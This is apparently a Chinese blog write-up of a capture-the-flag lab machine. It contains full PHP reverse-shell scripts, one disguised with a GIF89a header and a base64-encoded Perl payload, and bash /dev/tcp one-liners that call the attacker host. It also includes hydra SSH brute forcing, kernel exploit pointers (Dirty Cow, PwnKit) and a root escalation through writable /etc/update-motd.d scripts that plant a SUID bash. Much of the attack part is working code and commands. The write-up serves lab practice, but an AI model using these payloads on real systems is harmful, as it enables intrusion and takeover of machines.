由于您使用的是 3.10.0-229.el7 这个非常早期的 RHEL 7 内核，还有很多其他漏洞可能适用，但可靠性可能不如 Dirty Cow：

CVE-2016-8655 (AF_PACKET / Raw Sockets)： 另一个竞争条件漏洞，允许本地用户执行任意代码并获得 root 权限。

CVE-2017-1000253 (Stack Clash)： 堆栈冲突漏洞，可以被用来提权，但 Exploit 相对复杂且稳定性一般。

建议：

优先尝试 pkexec (PwnKit)，因为您之前枚举了它，且它与内核版本无关，非常通用。

其次尝试 Dirty Cow，它对您这个老旧的内核版本几乎是必杀技。

如果前两者失败，再考虑寻找针对您特定内核的 Exploit。 您可以使用 searchsploit 工具在本地 Exploit-DB 数据库中搜索：

Bash
# 在您的 Kali 或攻击机上运行
searchsploit 3.10.0-229

脏牛(Dirty Cow) - CVE-2016-5195

https://github.com/firefart/dirtycow

wget https://github.com/firefart/dirtycow/blob/master/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
./dirty
./dirty my-new-password

这个编译报错。换一个。

https://www.exploit-db.com/exploits/40847

https://www.exploit-db.com/exploits/40839

都失败了。

tags:

@ 01/01/0001

服务探测

获取到creds.txt文件。

cat creds.txt | base64 -d
yamdoot:Swarg

经测试不是ssh账号。看一下http://192.168.30.138/webdav

基于Web的分布式编写和版本控制（英语：Web-based Distributed Authoring and Versioning，缩写：WebDAV）是超文本传输协议（HTTP）的扩展，有利于用户间协同编辑和管理存储在万维网服务器文档。

登录成功，但是当前目录下什么都没有。

找一下webdav漏洞吧。

使用cyberduck登录一下webdav客户端。

上传反弹shell脚本文件。shell.php这个用不了。

<?php
// 反弹 Shell (PHP)
// 仅用于合法授权的渗透测试和安全研究

set_time_limit(0);
$ip = '192.168.30.131'; #你的监听IP和端口，这里是我的kali的ip
$port = 4444;

if (($sock = @fsockopen($ip, $port, $errno, $errstr, 30)) === false) {
    echo "无法连接到监听器。\n";
    exit;
}

$proc = @proc_open('cmd.exe', array(
    0 => $sock,
    1 => $sock,
    2 => $sock
), $pipes);

if (!is_resource($proc)) {
    echo "无法打开进程。\n";
    fclose($sock);
    exit;
}

$status = proc_get_status($proc);
while ($status['running']) {
    $status = proc_get_status($proc);
    usleep(10000);
}

proc_close($proc);
fclose($sock);
?>

…

重写一个更强大的脚本。

GIF89a
<?php
// PHP 反弹 Shell - 具备多种执行方式和Base64编码
// 仅用于合法授权的渗透测试和安全研究

set_time_limit(0); // 设置脚本执行时间不限制

// ====== 配置你的监听器信息 ======
$yourip = "192.168.30.131";    // 替换为你的 Kali 或其他监听服务器的 IP 地址
$yourport = '4444';        // 替换为你设置的监听端口
// ==================================

// 获取命令的绝对路径，以提高兼容性
function which_cmd($cmd_name) {
    $path = execute("which $cmd_name");
    return (empty($path) ? $cmd_name : trim($path));
}

// 尝试多种方式执行系统命令
function execute($command) {
    $result = '';
    if (function_exists('exec')) {
        @exec($command, $output);
        $result = join("\n", $output);
    } elseif (function_exists('shell_exec')) {
        $result = @shell_exec($command);
    } elseif (function_exists('system')) {
        @ob_start();
        @system($command);
        $result = @ob_get_contents();
        @ob_end_clean();
    } elseif (function_exists('passthru')) {
        @ob_start();
        @passthru($command);
        $result = @ob_get_contents();
        @ob_end_clean();
    } elseif (is_resource($fp = @popen($command, "r"))) {
        $result = '';
        while (!@feof($fp)) {
            $result .= @fread($fp, 1024);
        }
        @pclose($fp);
    }
    return $result;
}

// 创建文件并写入Base64解码后的内容
function create_file($filename, $encoded_content) {
    if ($fp = @fopen($filename, 'w')) {
        @fputs($fp, @base64_decode($encoded_content));
        @fclose($fp);
        return true;
    }
    return false;
}

// Base64 编码的 Perl 反弹 Shell 脚本
// 注意: 'lynx' 是一个占位符，实际连接后可运行任何命令
$perl_reverse_shell_b64 = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

// 将 Perl Shell 脚本写入 /tmp/.back_c 文件
$temp_file = '/tmp/.back_c';
if (create_file($temp_file, $perl_reverse_shell_b64)) {
    // 赋予执行权限
    execute("chmod +x $temp_file");
    // 执行 Perl Shell，并传入 IP 和端口作为参数，& 让其在后台运行
    $command = which_cmd('perl') . " $temp_file $yourip $yourport &";
    $result = execute($command);
    echo "尝试执行反弹Shell...\n";
    // 可以在这里输出 $result 来查看执行信息，用于调试
    // echo "<pre>$result</pre>";
} else {
    echo "无法创建临时文件: $temp_file\n";
}

?>

kali开启监听。

socat file:`tty`,raw,echo=0 tcp-listen:4444

#或
nc -lvnp 4444

这里因为我的windows有火绒，脚本文件被删除了。就换了kali的cadaver工具，这是连接webdav服务的客户端。

davtest，可以测试通过webdav能上传哪些后缀文件以及其对应权限：

davtest -url http://10.10.10.144/webdav -auth yamdoot:Swarg

上传文件。

python3 -c 'import pty; pty.spawn ("/bin/bash")'  //交互式shell
 
export TERM=xterm  //添加环境变量，使shell更加完整

三个版本的shell都用不了居然。shellmini.php

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.30.131/4444 0>&1'"); ?>

真要醉了，这还反弹不了，我要睡了。

发现是4444端口kali防火墙没开放，用443端口就好了。

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.30.131/443 0>&1'"); ?>

信息收集

当前是www-data用户。可登录用户有：

看到有历史命令文件。

查看了DavLock文件，然后到inferno用户目录下，果然提示是输入密码，应该是就是DavLock的内容。d4эh^

结果并不是。总之，d4эh^ 本身没有直接的意义，它只是一个被服务器随机生成的字符串，用来作为文件锁定的唯一 ID。

继续信息收集。

find / -perm -u=s -type f 2>/dev/null

cat /etc/crontab

find / -writable -type f -not -path "/proc/*" -not -path "/sys/*" -not -path "/var/*" 2>/dev/null

可写文件中看了两个文件。

brainfuck解码&&ssh登录

hell.sh文件下是brainfuck加密。

cat hell.sh | hsbrainfuck

解密得到chitragupt。说这是通往地狱的高速公路。那么目前看来还有ssh用的上账号登录。

root
yamdoot
inferno
narak

hydra -L user.txt -p chitragupt -v 192.168.30.138 ssh

可以看到是inferno用户的ssh连接。

ssh inferno@192.168

提权信息收集

继续筛选可操作文件。

find / -writable -type f -not -path "/proc/*" -not -path "/sys/*"  2>/dev/null

主要集中在inferno家目录和/etc/update-motd.d/下。

对比一下，家目录下的都为隐藏文件，而另一个目录下权限明显过泛。

update-motd.d目录提取

/etc/update-motd.d/ 是一个位于Linux 系统（尤其是Debian/Ubuntu 及其衍生发行版）中的目录，用于存放动态生成登录消息(MOTD - Message Of The Day) 的脚本。当用户登录系统时，这些脚本会被按顺序执行，其输出内容会组合起来显示为一条欢迎信息或系统通知。

如何使用 /etc/update-motd.d/ 目录

创建脚本：

在该目录下创建以数字开头的文件，例如 10-my-script。数字前缀决定了脚本的执行顺序（数字越小，优先级越高）。
编写脚本内容：

脚本可以包含任何shell命令，用于收集和显示系统信息，例如系统负载、可用磁盘空间、用户数量等。
赋予执行权限：

为脚本赋予可执行权限，例如 chmod +x 10-my-script。
登录验证：

下次用户登录系统时，这些脚本会自动执行，并将输出的内容显示在登录提示符之前。

示例

创建一个名为 05-welcome 的脚本，用于显示欢迎信息：

代码

#!/bin/bash
echo "欢迎来到您的系统！"
echo "今天是个好日子！"

然后，通过 chmod +x 05-welcome 赋予执行权限即可。

写入成功。

接下来，优先使用数字小的，比如00-header。

echo "cp /bin/bash /tmp/rootbash" >> 00-header
echo "chmod +s /tmp/rootbash"

#or
echo "cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash" >> 00-header

重新登录该用户来加载脚本。inferno:chitragupt

执行。

依旧是该用户？？？？这是为什么

在 Bash shell 中，-p 选项非常关键，特别是在处理 SUID（Set User ID）程序时。

为什么需要 -p？

当你执行一个设置了 SUID 位的程序时，正常情况下，该程序会以文件所有者的权限（在本例中是 root）运行。但是，为了安全，Bash shell 在检测到自己是以 SUID 方式运行时，会自动丢弃这些特权。

这意味着，即使你执行了 /tmp/pwnshell 这个有 SUID 位的 shell，它也会立即将你的权限降回到普通用户，从而使提权失败。

-p 选项就是用来告诉 Bash shell：“请保持特权！”

-p 代表 privileged（特权）。

当你使用 /tmp/pwnshell -p 运行 Bash 时，它会进入一个特殊的“特权模式”。在这个模式下，它会保留有效的 UID 和 GID，这意味着你的 shell 会继续以 root 权限运行，而不是降级到你的普通用户权限。

简单来说：

没有 -p：bash 会自动丢弃 root 权限，你仍然是普通用户。

有了 -p：bash 会保持 root 权限，你就成功提权了。

这个 -p 选项是一个很重要的安全特性，但攻击者也会利用它来绕过权限降级。在打靶场时，记住这个小技巧能帮你快速获得 root shell。

那么重新执行。

/tmp/rootbash -p

解释 id 命令的输出

uid=1002(inferno): 这是你的实际用户 ID (Real User ID)。它代表了启动当前进程的原始用户，也就是你登录时的普通用户 inferno。这个 ID 是不会改变的。

gid=1002(inferno): 这是你的实际组 ID (Real Group ID)。它同样代表了你的原始用户所属的组 inferno。

euid=0(root): 这是你的有效用户 ID (Effective User ID)。这是系统用来检查你对文件或进程的权限时所使用的 ID。因为你成功提权了，你的有效用户 ID 变成了 0，也就是 root。

egid=0(root): 这是你的有效组 ID (Effective Group ID)。同理，它也变成了 0，也就是 root。

成功。/root/root.txt拿到flag。

welcome to my blog~!

things i love:

端口扫描

服务探测

目录爆破

mercuryfacts探测

SSH登录

提权

CVE-2021-4034 的独立漏洞利用 - Pkexec 本地提权

Flag

脚本分析

漏洞原理：环境变量劫持与内存损坏

漏洞利用代码分析

扫描不到ip靶场网卡问题

端口扫描

目录扫描

信息收集

steghide

端口扫描

服务探测

信息收集

.htaccess 文件内容详解

提权

切换思路

/etc/passwd提权

端口扫描

服务探测

SSH 服务探测

FTP 服务探测

mget下载

wget下载目录文件

lftp命令下载

smb服务

smb服务探测

使用nmap探测

使用smbclient探测

使用enum4linux (专用枚举工具)

探测流程总结

smb服务连接

使用smbclient

使用mount挂载

撞库

登录ftp

登录2121端口的ftp服务

SSH密钥登录

上传公钥

使用私钥登录

提权

polkit的PwnKit提权

ProFTPD 1.3.5 mod_copy漏洞

内核提权

优先级最高的内核提权漏洞

1. 脏牛 (Dirty Cow) - CVE-2016-5195

如何利用 (简要步骤)：

2. PwnKit (Polkit Local Privilege Escalation) - CVE-2021-4034

如何检查和利用 (简要步骤)：

其他可能适用的漏洞

脏牛(Dirty Cow) - CVE-2016-5195

服务探测

信息收集

brainfuck解码&&ssh登录

提权信息收集

update-motd.d目录提取

为什么需要 -p？

解释 id 命令的输出

`.htaccess` 文件内容详解

2. `PwnKit` (Polkit Local Privilege Escalation) - CVE-2021-4034

为什么需要 `-p`？

解释 `id` 命令的输出